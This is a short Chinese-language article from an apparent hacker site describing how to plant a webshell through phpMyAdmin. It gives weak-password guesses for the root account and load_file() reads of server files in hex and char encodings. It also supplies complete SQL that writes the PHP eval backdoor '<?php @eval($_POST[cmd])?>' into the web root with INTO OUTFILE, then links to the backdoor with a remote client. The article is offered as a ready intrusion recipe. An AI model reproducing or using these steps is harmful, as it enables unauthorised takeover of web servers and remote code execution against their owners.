您现在的位置: 主页 > 黑客基地 > 入侵检测 > 文章内容

phpmyadmin执行语句拿webshell

作者: 黑客基地 来源:黑客入侵 时间: 2015-06-27 阅读:
很多时候,我们通过网站后台无法获得,然后我们就可以通过第3方漏洞来获得网站的webshell。

如果说服务器有安装phpmyadmin 且我们已知。网站的物理路径和phpmyadmin的帐号密码。

或者root密码可以通过以下方法进行尝试:

方法:load_file()


  1. C:\boot.ini
  2. load_file(0x433A5C626F6F742E696E69) 16进制 load_file(char(67,58,92,98,111,111,116,46,105,110,105)) ascii Conn.php config.php mainconn.php

很多情况有时候管理员没有修改root密码那么可以通过弱口令root root rrot 123 等 密码来进行尝试登录

 

 

当我们或者了phpmyadmin的最高权限root权限后,且已知网站的物理路径 (物理路径一般在网站后台会有显示 )

 

 

就可以通过一下sql语句来获得网站的webshell。

 

假设网站的物理路径是 C:\htdocs

就可以执行下面的SQL语句


  1. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile ' C:/htdocs/1.php'; (这里的要把网站的物理路径的\修改为/) Drop TABLE IF EXISTS a; ----end code---

 

12320131216181310

执行语句后如果提示以上信息说明SQL语句已经执行成功。然后就可以在网站根目录后面加上1.php就可以直接获得一句话。

然后通过一句话客户端来链接就可以获得网站的webshell了。